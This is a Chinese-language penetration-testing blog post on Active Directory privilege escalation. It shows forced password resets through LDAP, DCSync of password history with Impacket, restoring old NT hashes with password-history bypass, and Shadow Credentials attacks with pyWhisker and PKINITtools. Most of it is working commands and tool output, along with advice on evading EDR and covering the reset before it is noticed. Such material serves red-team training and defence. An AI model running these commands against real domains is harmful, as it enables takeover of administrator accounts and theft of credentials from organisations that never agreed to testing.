目录导航
在渗透测试期间,您可能希望更改用户密码的常见原因有两个:
- 你有他们的 NT 哈希,但没有他们的明文密码。将他们的密码更改为已知的明文值可以让您访问不能选择 Pass-the-Hash 的服务。
- 您没有他们的 NT 哈希或明文密码,但您有权修改这些密码。这可以允许横向移动或特权升级。
通过利用Mimikatz的 lsadump::setntlm和lsadump::changentlm函数,过去已经涵盖了这两个用例。虽然Mimikatz是最好的攻击工具之一,但我会尽量避免使用它,因为它是反病毒和 EDR 工具的高度目标。在这篇文章中,我将专门讨论用例 #2 — 为横向移动或权限提升重置密码。
考虑以下场景:
您可以控制n00py用户帐户,该帐户有权重置esteban_da的密码,他是Domain Admins组的成员。

首先,我将使用 Windows 快速介绍这种攻击。要执行初始密码重置,您有几个选项:
- 内置的net.exe二进制文件。我倾向于避免运行 net.exe,因为这通常是 EDR 的危险信号。
- PowerView的Set-DomainUserPassword。这也有效,但是,如果可能的话,我希望避免导入任何 PowerShell 脚本。
- 内置的Set-ADAccountPassword PowerShell 命令行开关。这是我通常喜欢的一个。

通过这次重置,我们造成了一个潜在的问题。用户 esteban_da 将无法再登录,因为我们更改了他的密码,我们需要在它被发现之前将其改回来。由于我们现在可以控制 Domain Admins 组中的帐户,因此我们可以将其重新设置。
使用 WINDOWS 重置密码
首要任务是恢复先前密码的 NT 哈希。最简单的方法是使用Mimikatz,尽管我将介绍一些替代方案。

另一种恢复方法是使用命令行工具恢复 NTDS.dit 数据库以及 SYSTEM 注册表配置单元。有很多方法可以做到这一点,但一种简单的方法是使用内置的ntdsutil和命令。

拥有这些文件后,可以将它们从系统中拉出以进行离线提取。
一旦离线,Mimikatz可以在不被发现的情况下使用,但也可以使用Michael Grafnetter的 DSInternals 进行恢复。

现在原始 NT 哈希已恢复,是时候重置它了。首先,使用Mimikatz:

这也可以使用DSInternals和Set-SamAccountPasswordHash来完成:

我喜欢DSInternals具有双重用途,通常不被视为攻击性工具。它甚至可以直接从Microsoft PowerShell Gallery安装。
到目前为止,所有方法都需要使用 Windows,但是如果我们根本不想使用 Windows 怎么办?
使用 LINUX 重置密码
也可以仅使用在 Linux 上运行的命令行工具复制此攻击链。
初始密码重置可以使用 python ldap3库通过 LDAP 完成。首先,我们使用n00py帐户绑定到 LDAP。然后我们对esteban_da执行密码重置。
# python3
>>> import ldap3
>>> from ldap3 import ALL, Server, Connection, NTLM, extend, SUBTREE
>>> user = 'n00py'
>>> password = 'PasswordForn00py'
>>> server = ldap3.Server('n00py.local',get_info = ldap3.ALL, port=636, use_ssl = True)
>>> c = Connection(server, user, password=password)
>>> c.bind()
True
>>> c.extend.microsoft.modify_password('CN=ESTEBAN DA,OU=EMPLOYEES,DC=N00PY,DC=LOCAL', 'NewPass123')
True
通过 LDAP 重置密码
重置密码后,我们就可以控制Domain Admin。然后可以使用带有-just-dc-user和-history标志的Impacket的secretsdump.py对esteban_da帐户执行 DCSync 。
# python3 impacket/examples/secretsdump.py esteban_da:[email protected] -just-dc-user esteban_da -history
Impacket v0.9.25.dev1+20220217.14948.9fee58da - Copyright 2021 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
n00py.local\esteban_da:1119:aad3b435b51404eeaad3b435b51404ee:<CURRENT NTHASH>:::
n00py.local\esteban_da_history0:1119:<OLD NT HASH>:::
使用 Impacket 转储密码历史
一旦之前的 NT 哈希恢复,就可以使用 Impacket 中的 smbpasswd.py 将其设置回来。
注意:这不会绕过密码策略要求,因此您需要事先枚举,尤其是最短密码期限和密码历史记录。这可以使用 Windows 上的net accounts /domain命令或使用CrackMapExec 中的–pass -pol标志来完成。如果密码策略成为问题,您可能必须在妥协后对其进行修改。
# python3 smbpasswd.py n00py.local/esteban_da:[email protected] -newhashes aad3b435b51404eeaad3b435b51404ee:<OLD NT HASH>
Impacket v0.9.25.dev1+20220217.14948.9fee58da - Copyright 2021 SecureAuth Corporation
[*] NTLM hashes were changed successfully.
使用 Impacket 重置 NT 哈希
在撰写本文时,存在两 (2) 个对Impacket的主动拉取请求。这些请求增加了通过直接修改域控制器上的 NTDS 来重置密码的能力,就像Mimikatz所做的那样。这允许绕过密码策略,但需要域管理员级别的权限才能执行。
通过使用 Impacket PR #1172,我们可以使用另一个域管理员帐户并绕过密码历史记录将esteban_da重置回原始哈希值。
# python3 smbpasswd.py n00py.local/[email protected] -hashes :<ADMINISTRATOR NT HASH> -reset esteban_da -newhashes :<ESTEBAN_DA NT HASH>
Impacket v0.9.24.dev1+20210929.201429.1c847042 - Copyright 2021 SecureAuth Corporation
[*] NTLM hashes were set successfully.
使用 Impacket 重置 NT 哈希并绕过密码历史 PR#1172
另一个需要注意的是,在将密码哈希设置回其原始值后,该帐户会被设置为已过期的密码。要清除此标志,我们可以将 LDAP 与从 DCSync 恢复的另一个域管理员帐户的 NT 哈希一起使用。
# python3
>>> import ldap3
>>> from ldap3 import ALL, Server, Connection, NTLM, extend, SUBTREE
>>> server = ldap3.Server('n00py.local',get_info = ldap3.ALL, port=636, use_ssl = True)
>>> user = 'n00py.local\\Administrator'
>>> password =’<LM HASH>:<NT HASH>’
>>> c = Connection(server, user, password=password, authentication=NTLM)
>>> c.bind()
True
>>> from ldap3 import MODIFY_ADD, MODIFY_REPLACE, MODIFY_DELETE
>>> changeUACattribute = {"PwdLastSet": (MODIFY_REPLACE, ["-1"]) }
>>> c.modify('CN=ESTEBAN DA,OU=EMPLOYEES,DC=N00PY,DC=LOCAL', changes=changeUACattribute)
True
删除过期密码属性
然后将esteban_da帐户设置回其原始配置。
另一个Impacket PR #1171的工作方式大致相同,但语法略有不同。
# python3 smbpasswd.py n00py.local/esteban_da:@n00py.local -newhashes :<ESTEBAN_DA NT HASH> -altuser n00py.local/administrator -althash <ADMINISTRATOR NT HASH> -admin
Impacket v0.9.24.dev1+20220226.11205.67342473 - Copyright 2021 SecureAuth Corporation
[*] Credentials were injected into SAM successfully.
使用 Impacket 重置 NT 哈希并绕过密码历史 PR 1171
奖励:影子凭证
我们是否需要重置esteban_da的密码才能控制它?答案实际上是否定的,我们没有。再一次,让我们看一下BloodHound 图:

我们看到,我们不仅拥有重置密码的权限,而且还拥有GenericWrite权限。但是,这是什么意思?如果我们查看BloodHound滥用信息,它会让我们知道我们也可以执行有针对性的 Kerberoast 攻击。
很好,但这仍然需要我们能够从 Kerberos 票证中恢复明文密码,除非用户密码较弱,否则这是不可能的。
此外,BloodHound提示并非包罗万象,BloodHound并不总是向您显示从一个对象到另一个对象的每条可用边。这是因为某些边是隐式的,例如GenericAll,这意味着您也有GenericWrite,因此列出来是多余的。
如果我们要删除GenericWrite并重新运行BloodHound集合,我们会看到:

我们现在看到了四 (4) 个我们以前没有看到的边缘。首先,让我们检查一下BloodHound的滥用信息:
- WriteDACL:这告诉我们可以添加GenericAll权限,然后执行有针对性的 Kerberoast 攻击或强制密码重置。
- AllExtendedRights:这让我们知道我们可以执行强制密码重置。
- WriteOwner:这让我们知道我们可以更改对象的所有者并再次执行有针对性的 Kerberoast 攻击或强制密码重置。
- AddKeyCredentialLink:在撰写此博客时,此边缘不存在帮助文本。
使用AddKeyCredentialLink权限,可以执行影子凭据攻击。虽然这种技术被认为是攻击者可以悄悄地在环境中持续存在的一种方式,但它对于特权升级也很有用,就像强制密码重置一样。
这使我们能够为用户恢复 Kerberos 票证并恢复他们的 NT 哈希,有效地充当单用户 DCSync。我不会详细介绍攻击的工作原理,因为这已经被广泛介绍了,但我将演示如何从 Windows 和 Linux 执行这种攻击。
来自 WINDOWS 的影子凭证
可以使用Elad Shamir 的Whisker从 Windows 执行此攻击。它使用起来非常简单,在添加 Shadow Credentials 后,它会输出证书和Rubeus命令来恢复 Kerberos TGT 和 NT 哈希。


来自 LINUX 的影子凭证
在 Linux 中,我们可以使用Charlie Bromberg 的pyWhisker执行此攻击。
# python3 pywhisker.py -d "n00py.local" -u "n00py" -p "PasswordForn00py" --target "esteban_da" --action "add" --filename hax
[*] Searching for the target account
[*] Target user found: CN=esteban da,OU=Employees,DC=n00py,DC=local
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 02b2e9ef-d55f-60fe-bca9-f254249a49af
[*] Updating the msDS-KeyCredentialLink attribute of esteban_da
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: hax.pfx
[*] Must be used with password: dfeiecA9SZN75zJ7P5Zs
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
使用 pyWhisker 添加影子凭证
一旦影子凭证就位,Kerberos TGT 和 NT 哈希就可以使用Dirk-jan Mollema的 PKINITtools 恢复。
# python3 gettgtpkinit.py -cert-pfx hax.pfx -pfx-pass dfeiecA9SZN75zJ7P5Zs n00py.local/esteban_da esteban_da.ccache
2022-02-21 16:29:58,106 minikerberos INFO Loading certificate and key from file
2022-02-21 16:29:58,125 minikerberos INFO Requesting TGT
2022-02-21 16:29:58,148 minikerberos INFO AS-REP encryption key (you might need this later):
2022-02-21 16:29:58,148 minikerberos INFO 571d3d9f833365b54bd311a906a63d95da107a8e7457e8ef01b36810daadf243
2022-02-21 16:29:58,151 minikerberos INFO Saved TGT to file
# python3 getnthash.py -key 571d3d9f833365b54bd311a906a63d95da107a8e7457e8ef01b36810daadf243 n00py.local/esteban_da
Impacket v0.9.25.dev1+20220217.14948.9fee58da - Copyright 2021 SecureAuth Corporation
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
<NT HASH>
使用 PKINITtools 获取 TGT 和 NT 哈希
最后的想法
虽然其中一些主题之前已经介绍过,但拥有可用于实现相同目标的多种技术是很有价值的。每个环境都有其独特的限制,拥有更多可用选项会增加成功的可能性。
转载请注明出处及链接